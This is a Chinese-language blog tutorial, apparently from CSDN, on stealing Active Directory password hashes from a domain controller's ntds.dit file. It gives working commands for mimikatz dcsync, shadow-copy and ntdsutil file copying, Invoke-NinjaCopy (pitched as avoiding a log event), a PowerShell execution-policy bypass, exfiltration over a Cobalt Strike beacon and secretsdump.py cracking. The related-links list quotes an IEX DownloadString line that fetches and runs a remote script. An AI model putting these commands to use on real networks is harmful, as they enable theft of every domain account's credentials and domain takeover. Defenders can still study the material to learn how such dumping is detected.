ntds.dit文件的获取与解密

最新推荐文章于 2024-08-05 11:00:45 发布
最新推荐文章于 2024-08-05 11:00:45 发布
阅读量10w+ 收藏 20
点赞数 7
分类专栏: 渗透测试基础知识 密码破解 内网渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41874930/article/details/108141331
版权

它们在哪儿?

ntds.dit文件是域环境中域控上会有的一个文件,这个文件存储着域内所有用户的凭据信息(hash)。非域环境也就是在工作组环境中,有一个sam文件存储着当前主机用户的密码信息,想要破解sam文件与ntds.dit文件都需要拥有一个system文件。

ntds.dit文件位置: C:\Windows\NTDS\NTDS.dit
system文件位置:C:\Windows\System32\config\SYSTEM
sam文件位置:C:\Windows\System32\config\SAM

ntds.dit部分

在线破解

所谓的在线破解就是不用将域控上的ntds.dit文件下载下来,直接在已有的shell上破解。比如说你有一个cs弹回的beacon,就可以在beacon中直接利用mimikatz来破解,这一切的前提是有管理员权限。

Mimikatz有一个功能(dcsync),它可以利用目录复制服务(Directory Replication Service, DRS)从NTDS.DIT文件中提取密码哈希值。

可以通过dcsync直接获取test域内所有用户hash
lsadump::dcsync /domain:test.com /all /csv
在这里插入图片描述

也可以获取单个用户的详细信息
lsadump::dcsync /domain:test.com /user:kertgt
在这里插入图片描述

可以查看所有用户的所有详细信息
lsadump::lsa /inject
在这里插入图片描述

离线破解

离线破解一般需要两步,首先就是将远端域控的ntds.dit下载到本地,然后利用再在本地进行破解。ntds.dit文件一直在被windows系统使用,所以常规的复制下载方法是无法将文件下载到本地的,这里我推荐如下几个方法:

获取ntds.dit文件的方式

用vssadmin进行复制ntds文件

vssadmin create shadow /for=C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
执行完上述命令即可将ntds.dit复制到C盘下创建的ShadowCopy中。执行结果如下图所示:

在这里插入图片描述
在这里插入图片描述

也可以使用这个命令复制sam或者system文件:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\system.hiv
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\sam.hiv

使用ntdsutil

在这里插入图片描述
依次在命令行输入以下命令即可

Ntdsutil "activate instance ntds" Ifm "create full C:\ntdsutil" Quit quit

最终会在c盘下生成ntdsutil这个文件夹:
在这里插入图片描述
这个文件夹里面存有system文件与ntds.dit文件。

通过NinjaCopy获得域控服务器NTDS.dit文件

ninjacopy下载地址:https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1

Import-Module -name .\Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "c:\ntds.dit"
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "c:\system.hiv"

附录:绕过powershell执行策略的命令:
cmd中:powershell -ep bypass
powershell中:Set-ExecutionPolicy Bypass -Scope Process

也可以参考下面的链接
绕过powershell执行策略的方法

执行结果如下
在这里插入图片描述
这种方法没有调用Volume Shadow Copy服务,所以不会产生日志文件7036

参考文章:
域渗透——获得域控服务器的NTDS.dit文件

文件移动

我们这时候需要将文件下载到本地,这时候假设我们有一个cobalt strike的shell(除了这个方法外还可以用scp命令)。
首先我们可以在cs的客户端直接浏览到被控主机的文件情况,这时候将我们上一步得到的ntds.dit文件跟system.hiv文件下载到本地:
第一步首先在文件系统中选择下载:
在这里插入图片描述

在这里插入图片描述
第二步,下载好后需要同步到cs的客户端,也就是本地(不是vps)。
在这里插入图片描述
本地浏览文件:
在这里插入图片描述

本地破解

当把文件下载到本地后,就需要开始破解其中的密码了,这时候我们采用impacket的secretsdump.py这个脚本。
命令为:

python3 secretsdump.py -ntds ~/Desktop/ntds.dit -system ~/Desktop/system.hiv LOCAL

在这里插入图片描述

破解出的密码格式为domain\uid:rid:lmhash:nthash,例如krbtgt的密码要采用最后一个冒号后面的那个,也就是d8d2ad开头的

Shanfenglan7
关注
专栏目录
域控安全 ----> Ntds.dit文件抓取
huohaowen的博客
05-05 1723
大家还记得内网渗透的初衷吗???找到域馆,拿下域控!!拿下了域控就是拿下了整个域!!但是大家知道拿下域环境之后应该怎么操作吗(灵魂拷问)???那么下面,开始我们今天的内容 NTDS.DIT文件!!
域之ntds.dit
SecINAdmin的博客
11-26 1406
ntds.ditntds.dit为ad的数据库(C:\Windows\NTDS),内容有域用户、域组、用户hash等信息,域控上的ntds.dit只有可以登录到域控的用户(如域管用户、DC本地管理员用户)可以访问。ntds.dit包括三个主要表:数据表、链接表、sd表。所以只要在域渗透中能够获取ntds.dit就可以获取到所有域用户的用户名和对应的hash,ntds.dit是加密的,需要获取system来解密。查看dit数据库可使用https://github.com/yosqueoy/ditsna
内网渗透-windows获取(本地、域、Ntds.dit)登录凭证实战手法总结(超详细)
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
02-03 1966
获取一台域内主机权限时,接下来的渗透思路就是要获取更高权限的账号,用来访问域控或横向拓展,那么在获取本地用户、域用户凭证和获取域控Ntds.dit这一块就极其重要,将详细介绍红队渗透中使用获取登录凭证的手法。
内网渗透--提取域控NTDS
qq_62169455的博客
09-24 896
NTDS.DIT:为DC的数据库,内容有域用户、域组、用户hash等信息,域控上的ntds.dit只有可以登录到域控上的用户(如域管用户、DC本地管理员用户)可以访问,为了进一步保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。位置:C:\Windows\NTDS文件和SAM文件类似,是不能直接读取的,也不能复制。
域渗透之获得域控服务器的NTDS.dit文件
cj_Hydra's Blog
02-15 2096
前言: ntds.dit是主要的AD数据库,存放在c:\windows\NTDS\NTDS.dit,包括有关域用户,组和成员身份的信息,它还包括域中所有用户的密码哈希值,为了进一步保护哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。 因为这两个文件属于系统特殊文件,不能直接复制粘贴,所以需要用特殊的方式来复制粘贴。 当我们拿到域控的权限后,我们可以跑域内所有的hash值,...
域凭据获取——利用NTDS.DIT获取windows域哈希
最新发布
qq_55202378的博客
08-05 879
NTDS.DIT文件是域控制器的数据库文件,该文件作为AD的数据库,存储了AD的所有数据,包括域内的用户对象、组和组成员身份等信息,以及域内所有用户的凭据信息。该文件位于域控制器下的根目录下。NTDS.DIT文件与Windows主机中的SAM文件类似,不同点在于SAM文件中只存放本机的用户哈希,而NTDS.DIT文件中存放了所有域用户的哈希凭据。在windows中NTDS.DIT文件同样被Windows系统锁定,正常操作无法复制该文件,权限低于system的用户将无法读取。
利用卷影拷贝服务提取ntds.dit
hongduilanjun的博客
07-21 781
在活动目录中,所有的数据都保存在ntds.dit中。ntds.dit是一个二进制文件,存储位置为域控制器的%SystemRoot%\ntds\ntds.ditntds.dit中包含用户名、散列值、组、GPP、OU等与活动目录相关的信息。它和SAM文件一样,是被操作系统锁定的。在一般情况下系统运维人员会利用卷影拷贝服务(volumeShadowCopyServer,VSS)实现ntds.dit的拷贝,VSS本质上属快照(Snamshot)技术的一种,主要用于备份和恢复(即使目标文件被系统锁定)。...
【渗透笔记】域内密码凭证获取
白菜猪肉炖粉条
12-28 1742
Volume Shadow Copy 活动目录数据库 ntds.dit 活动目录数据库,包括有关域用户、组和组成员身份的信息。它还包括域中所有用户的密码哈希值。 为了保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。 因此想要破解sam文件ntds.dit文件都需要拥有一个system文件 ntds.dit文件位置:%SystemRoot%\NTDS\NTDS.dit system文件位置:%SystemRoot%\System32\config\SYSTEM sa
windows 域内密码凭证获取
weixin_43873557的博客
02-08 895
windows\NTDS\ntds.dit windows\system32\config\system windows\system32\config\security ntds.dit:活动目录数据库,包括有关域用户、组和组成员身份的信息。它还包括域中所有用户的密码哈希值。 为了保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。因此想要破解工作组sam文件ntds.dit文件都需要拥有一个system文件 AD DS数据存储: • 由 ntds.dit 文件构成 • 默
内网渗透(二十四)之Windows协议认证和密码抓取-Mimikatz读取sam和lsass获取密码
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-14 862
ProcDump 还包括使用窗口挂起 (使用相同的窗口挂起定义,Windows任务管理器使用) 、未经处理的异常监视,并且可以根据系统性能计数器的值生成转储。3、使用PowerSploit 的Out-MiniDump模块,PowerSploit是一个基于 Powershell 的渗透工具包,可以选择创建进程的完整内存转储。从lsass进程中提取passwords、keys、pin、tickets等信息。2、使用procdump 导出lsass.dmp文件。5、读取lsass.dmp文件
[内网渗透]—卷影拷贝提取ntds.dit
Sentiment的博客
12-08 997
ntds.dit文件是一个数据库,用于存储Active Directory数据,包括有关用户对象,组和组成员身份的信息。它包括域中所有用户的密码哈希。通过提取这些哈希值,可以使用诸如Mimikatz之类的工具执行哈希传递攻击,或使用诸如Hashcat之类的工具来破解这些密码。这些密码的提取和破解可以脱机执行,因此将无法检测到。一旦攻击者提取了这些散列,它们便可以充当域上的任何用户,包括域管理员。在活动目录中,所有的数据都保存在ntds.dit中。
NTDS.dit hash提取工具
weixin_34404393的博客
06-22 283
NTDS.dithash提取工具 为保证不修改quarkspwdump版权信息,没有quarkspwdump修改其他功能的使用,其他原有的功能都可以正常使用,只添加了几个自己添加的参数。NTDS.dit是个什么鬼呢? 在域内,HASH是存在NTDS.DIT中的,NTDS.DIT是一个二进制文件,就等同于本地计算机的SAM文件,它的存放位置是%SystemRoot%...
域控安全 ----> Ntds
2401_84969291的博客
05-14 352
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
【内网学习笔记】26、ntds.dit 的提取与散列值导出
TeamsSix 的 CSDN 空间
09-09 1416
0、前言 在活动目录中,所有数据都保存在 ntds.dit 文件中,ntds.dit 是一个二进制文件,存储位置为域控的 %SystemRoot%\ntds.dit ntds.dit 中包含(但不限于)用户名、散列值、组、GPP、OU 等与活动目录相关的信息,因此如果我们拿到 ntds.dit 就能获取到域内所有用户的 hash 在通常情况下,即使拥有管理员权限,也无法读取域控中的 ntds.dit 文件(因为活动目录始终访问这个文件,所以文件被禁止读取),它和 SAM 文件一样,是被 Windows 操作
NTDS.dit获取密码hash
a3320315的博客
05-31 401
获取NTDS.dit 加载ps脚本 IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.5/Invoke-NinjaCopy.ps1"); 提取本地sam文件 Invoke-NinjaCopy -Path C:\Windows\System32\config\sam -LocalDestination C:\Users\Administrator\Desktop\sam 提取域控NTDS.dit Invoke-NinjaCopy
域内密码凭证获取
qq_58000413的博客
04-26 1331
Quarks Pw Dump是一款开放源代码的Windows用户凭据提取工具,它可以抓取windows平台下多种类型的用户凭据,包括:本地账户、域账户、缓存的域账户和Bitlocker。ntds.dit:活动目录数据库,包括有关域用户、组和成员身份的 信息。VSSAdmini:是Windows系统提供的卷影复制服务(VSS)的管理工具,域环境默认安装。ntds.dit文件位置:%SystemRoot%\NTDS\NTDS.dit。可以 十分高效的破解ntds文件并将全部域域用户信息导出方便查找域用户状态。
怎么解析NTDS.dit
04-27
NTDS.dit是Windows操作系统中Active Directory数据库文件的一部分。要解析NTDS.dit文件,可以使用工具如dsdbutil、ntdsutil和esentutl等。这些工具可以帮助管理员执行各种操作,例如备份和还原数据库、重建索引、检查数据库状态等。此外,可以使用一些第三方工具进行NTDS.dit文件的解析,例如Active Directory解析器和LDP工具等。这些工具可以让管理员更方便地查看和管理Active Directory数据库文件。请注意,解析NTDS.dit文件需要具备一定的技术知识和经验,并且需要谨慎执行相关操作,以避免意外损坏数据库文件
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shanfenglan7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值